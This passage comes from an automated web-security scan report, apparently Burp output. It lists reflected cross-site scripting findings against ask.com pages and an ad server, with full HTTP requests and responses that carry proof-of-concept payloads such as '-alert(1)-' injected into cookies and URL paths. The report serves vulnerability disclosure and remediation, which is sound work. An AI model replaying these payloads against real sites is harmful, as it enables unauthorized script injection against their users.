Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /i/i2.html2a8a4%0aalert(1)//c9db6d901a9?t=2-1005410 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://ad.vulnerable.ad.partner/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1290271648369?
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserving.cpxadroit.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 20 Nov 2010 16:50:25 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Accept-Ranges: none
Cache-Control: max-age=600
Server: Powered by Highwinds-Software
Location: http://209.197.9.89:80/v8u2m5i8/cds/i/i2.html2a8a4
alert(1)//c9db6d901a9?t=2-1005410&dopvhost=adserving.cpxadroit.com&doppl=f34985b9bfae7b109c2d7b104de87249&dopsig=27af0d38f56e68dc3d2574586babd7f8
Content-Length: 196
Content-Type: text/html

http://209.197.9.89:80/v8u2m5i8/cds/i/i2.html2a8a4
alert(1)//c9db6d901a9
?t=2-1005410&dopvhost=adserving.cpxadroit.com&doppl=f34985b9bfae7b109c2d7b104de87249&dopsig=27af0d38f56e68dc3d2574586babd7f8

2.280. http://www.ask.com/ [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7e1'-alert(1)-'b912a2891cb was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA4f7e1'-alert(1)-'b912a2891cb; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:58:17 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU4OjE3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:58:17 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:58:17 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA4f7e1'-alert(1)-'b912a2891cb;u4=;u3=;u2=0;ord=-556541467?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

2.281. http://www.ask.com/about [user cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about

Issue detail

The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e19b3'-alert(1)-'4d5b7994e21 was submitted in the user cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dire19b3'-alert(1)-'4d5b7994e21; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:10:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:10:50 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjEwOjUwLVVUQw%3D%3D&po=0&pp=dire19b3%27-alert%281%29-%274d5b7994e21; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:10:50 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:10:50 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:10:50 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 102731


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>About Ask.com</title>
<link href="http://www.ask.com/inc/css/lib/yui/reset-fonts-grids_r2.8.css" type="text/css" rel="sty
...[SNIP]...
<script type="text/javascript">
var qstr = 'q=&o=0&l=dire19b3'-alert(1)-'4d5b7994e21&jss=1';
window.location = 'http://www.ask.com/about?'+ qstr;
</script>
...[SNIP]...

2.282. http://www.ask.com/ans [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ans

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0a4'-alert(1)-'33276c18830 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ans?qsrc=&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA7d0a4'-alert(1)-'33276c18830; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:02:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:02:19 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir5fb41; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAyOjE5LVVUQw%3D%3D&po=0&pp=dir5fb41; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:19 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:02:19 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 89518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA7d0a4'-alert(1)-'33276c18830;u4=;u3=;u2=0;ord=-349459782?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

2.283. http://www.ask.com/blogsearch [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /blogsearch

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54944'-alert(1)-'b88ed0e9dd4 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogsearch?qsrc=0&o=0&l=dir5fb41 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA54944'-alert(1)-'b88ed0e9dd4; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:03:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:03:16 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir5fb41; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAzOjE2LVVUQw%3D%3D&po=0&pp=dir5fb41; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:03:16 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:03:16 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 89518

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA54944'-alert(1)-'b88ed0e9dd4;u4=;u3=;u2=0;ord=-283002203?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

2.284. http://www.ask.com/homepage [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /homepage

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203e3'-alert(1)-'327530facef was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /homepage HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA203e3'-alert(1)-'327530facef; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:11:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:11:18 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjExOjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:11:18 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:11:18 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=0C41C9EC70F2B3A933ADE477A41477DA203e3'-alert(1)-'327530facef;u4=;u3=;u2=0;ord=-1313429672?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialog
...[SNIP]...

2.285. http://www.ask.com/pictureslanding [user cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The value of the user cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef5aa'-alert(1)-'3edbb990812 was submitted in the user cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=diref5aa'-alert(1)-'3edbb990812; __utmb=252994457.2.10.1290271572;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:58:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:58:30 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU4OjMwLVVUQw%3D%3D&po=0&pp=diref5aa%27-alert%281%29-%273edbb990812; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 58798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<title>Im
...[SNIP]...



var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=A90335E3731F52B836174ECB80DEBDFB&qsrc=121&dm=all&qrt=2&lid=&o=0&l=diref5aa'-alert(1)-'3edbb990812';


_matchUrl+= "&userip=174.122.23.218";


_matchUrl+="&losid=a&locid=ph&lodid=us";


...[SNIP]...

2.286. http://www.ask.com/pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1 [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64b88'-alert(1)-'a597c89dd3c was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%253Balert(1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAzOjI1LVVUQw%3D%3D&po=0&pp=dir5fb41%27%3Balert%28document.cookies%29%2F%2Fd1f92dec88a; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|1; qc=0; cu.wz=0; gcht=; wz_sid=0B45CFE073F3F30B5FA9E877A6187EDA; wz_uid=074DCFE874F3F30B5FA9E877A6187EDA64b88'-alert(1)-'a597c89dd3c; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user="o=0&l=dir5fb41'; __utmb=252994457.2.10.1290271572;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 18:01:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ldst=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 18:01:13 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE4OjAxOjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:01:13 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:01:13 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 18:01:13 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 89390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=074DCFE874F3F30B5FA9E877A6187EDA64b88'-alert(1)-'a597c89dd3c;u4=;u3=;u2=0;ord=-51669521?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs,
...[SNIP]...

2.287. http://www.ask.com/pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES [wz_uid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding%3Fo%3D0%26l%3Ddir5fb41%27%3Balert(DOCUMENT.COOKIES

Issue detail

